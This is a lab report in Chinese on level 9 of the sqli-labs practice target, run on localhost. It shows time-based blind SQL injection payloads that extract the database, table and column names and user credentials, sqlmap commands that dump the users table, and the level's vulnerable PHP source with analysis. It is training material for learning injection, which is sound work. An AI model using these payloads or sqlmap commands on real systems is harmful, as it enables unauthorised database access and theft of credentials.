sql-labs靶场第九关测试报告

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、寻找注入点

2、注入数据库

①寻找注入方法

②爆库，查看数据库名称

③爆表，查看security库的所有表

④爆列，查看users表的所有列

⑤成功获取用户名和密码信息

3、sqlmap注入方法

①爆库

②爆表

③爆列

④爆字段

四、源代码分析

五、结论

---

一、测试环境

1、系统环境

渗透机：本机(127.0.0.1)

靶  机：本机(127.0.0.1)

2、使用工具/软件

火狐浏览器的hackbar插件，版本：2.3.1；

测试网址：http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/

二、测试目的

测试get型的sql注入，时间盲注出数据库中的用户名和密码；

使用sqlmap爆破，熟悉sqlmap的参数。

三、操作过程

1、寻找注入点

根据提示，将id作为参数，值为数字

输入id之后，页面回显  You are in.....

测试符号

给数字加单引号  ‘  ，还是正常回显，不管输入什么，都是这样

只有时间盲注了，注入成功就停两秒刷新，否则立即刷新

添加1=1判断，页面两秒后刷新

?id=1' and if(1=1,sleep(2),0) --+  

If函数会对第一个参数进行真假判断，真则执行第二个参数，假则执行第三个参数

尝试1=2判断，页面立即刷新

?id=1' and if(1=2,sleep(2),0) --+  

2、注入数据库

①寻找注入方法

这关只有正常回显了，报错也不会显示

可以利用时间盲注进行注入

符合条件时执行if的true结果，不符合就执行false结果

依旧是结合length函数判断真假与否

?id=1' and if((length(database())>7),sleep(2),0) --+

?id=1' and if((length(database())=8),sleep(2),0) --+

由此可见，数据库名长度是8个字符

②爆库，查看数据库名称

?id=1' and if((ascii(substr(database(),1,1))>100),sleep(2),0) --+

?id=1' and if((ascii(substr(database(),1,1))<150),sleep(2),0) --+

Database()函数返回当前数据库

Substr函数提取数据库名的第一个字母，更改参数，提取第二个、第三个

根据布尔判断，逐渐缩小数据库第一个字母的ASCII码值的范围，直到确定ASCII码值是多少，从而确定是哪个字母，不断尝试可以得出数据库名（时间漫长）

?id=1' and if((ascii(substr(database(),1,1))<150),sleep(2),0) --+

③爆表，查看security库的所有表

?id=1' and if(ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1))>100,sleep(2),0) -- +

?id=1' and if(ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1))<102,sleep(2),0) -- +

limit(0,1)是第一行，第一个表

依此类推，limit(1,1)是第二行，第二个表名，substr的第二个参数是起始位置，改第二个字母...第三个......，直到ASCII码值大于1都报错就是没有字母或者没有这行了

可以将所有字母拼接起来那就是所有数据库表名了

同理，确定表名的字母，慢慢拼……

使用inforamtion_schema数据库的tables方法查看本数据库的所有表

?id=1' and if(ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1))<102,sleep(2),0) -- +

④爆列，查看users表的所有列

?id=1' and if((ascii(substr((select column_name from information_schema.columns where
table_name='users' limit 2,1),3,1)))=115,sleep(2),0) -- +

爆列同理

依旧是inforamtion_schema数据库，使用columns方法查看对应数据表的所有列

⑤成功获取用户名和密码信息

爆字段值，查看username和password字段的所有信息

?id=1' and if((ascii(substr(( select  username from users limit 0,1),1,1)))>1,sleep(2),0) -- +

?id=1' and if((ascii(substr(( select  username from users limit 0,1),1,1)))>1,sleep(2),0) -- +

同理

3、sqlmap注入方法

①爆库

Sqlmap方法只需要把url的less-1改为9就可以了，结果都是一样的

盲注手注太费时间了，还是用sqlmap吧

Sqlmap稳定发挥，yyds

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1 –dbs

使用python程序

-u  指定url

--dbs   是爆库的参数

②爆表

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1 -D
security –tables

-D  指定数据库，在这个数据库里找数据表

--tables   爆表的参数

③爆列

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1 -D
security -T users –columns

-D   指定数据库

-T   指定数据表

--columns    爆破列名的参数

④爆字段

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1 -D
security -T users -C username,password --dump

-D   指定数据库

-T   指定数据表

-C   指定需要爆破的列名

--dump    爆破字段值的参数

四、源代码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);if($row){echo '<font size="5" color="#FFFF00">'; echo 'You are in...........';echo "<br>";echo "</font>";}else {echo '<font size="5" color="#FFFF00">';echo 'You are in...........';//print_r(mysql_error());//echo "You have an error in your SQL syntax";echo "</br></font>";    echo '<font color= "#0000ff" font size= 3>';    }
}else { echo "Please input the ID as parameter with numeric value";}?>

1.error_reporting(0);函数，关闭了php代码的所有错误报告。

2.获取的id值，直接写入了日志记录文件，同时也直接应用在sql语句中，没有任何过滤。Sql语句中给id值加了引号，因此，闭合符合为 ‘        。

3.这里语句正确只会回显正确语句“you are in ….”，语句错误不会回显，利用时间盲注，可以根据页面刷新时间来判断是否注入成功。

4.Sql语句只取一行，注入时会把注释掉。

5.利用ascii函数和substr函数可以测出数据库内容。

五、结论

传递id号是sql注入漏洞的一大特点，有id参数就需要特别留意。

寻找注入点的步骤十分重要，找到注入点和闭合符号之后的测试就顺理成章了。

用sqlmap的话，需要把id参数带上，不然爆不出来。

这关使用时间盲注，利用ascii函数和substr函数可以测出数据库内容。